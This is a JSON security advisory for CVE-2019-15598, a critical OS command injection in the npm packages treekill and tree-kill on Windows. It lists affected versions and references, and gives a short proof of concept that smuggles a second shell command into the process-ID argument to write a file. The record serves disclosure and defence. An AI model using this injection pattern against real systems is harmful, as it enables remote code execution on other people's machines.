{"id":"GHSA-j7fq-p9q7-5wfv","summary":"Treekill Enables OS Command Injection","details":"A Code Injection exists in treekill and tree-kill on Windows which allows a remote code execution when an attacker is able to control the input into the command.\n\n### Steps To Reproduce:\nCreate the following PoC file:\n\n```js\nvar kill = require('treekill');\nkill('3333332 & echo \"HACKED\" \u003e HACKED.txt & ');\n```\n\nExecute the following commands in terminal:\n\n```shell\nnpm i treekill # Install affected module\ndir # Check *HACKED.txt* doesn't exist\nnode poc.js #  Run the PoC\ndir # Now *HACKED.txt* exists :)\n```\n\nThe HACKED.txt has been created","aliases":["CVE-2019-15598"],"modified":"2024-04-22T23:44:02.289143Z","published":"2022-05-24T17:04:00Z","database_specific":{"cwe_ids":["CWE-78"],"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2024-04-22T23:19:59Z","nvd_published_at":"2019-12-18T21:15:00Z"},"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2019-15598"},{"type":"WEB","url":"https://github.com/pkrumins/node-tree-kill/issues/30"},{"type":"WEB","url":"https://github.com/pkrumins/node-tree-kill/pull/31"},{"type":"WEB","url":"https://github.com/pkrumins/node-tree-kill/commit/ff73dbf144c4c2daa67799a50dfff59cd455c63c"},{"type":"WEB","url":"https://hackerone.com/reports/701183"},{"type":"WEB","url":"https://hackerone.com/reports/703415"},{"type":"WEB","url":"https://github.com/node-modules/treekill/blob/master/index.js#L32"},{"type":"PACKAGE","url":"https://github.com/pkrumins/node-tree-kill"},{"type":"WEB","url":"https://security.snyk.io/vuln/SNYK-JS-TREEKILL-536781"}],"affected":[{"package":{"name":"tree-kill","ecosystem":"npm","purl":"pkg:npm/tree-kill"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.2.2"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-j7fq-p9q7-5wfv/GHSA-j7fq-p9q7-5wfv.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}]}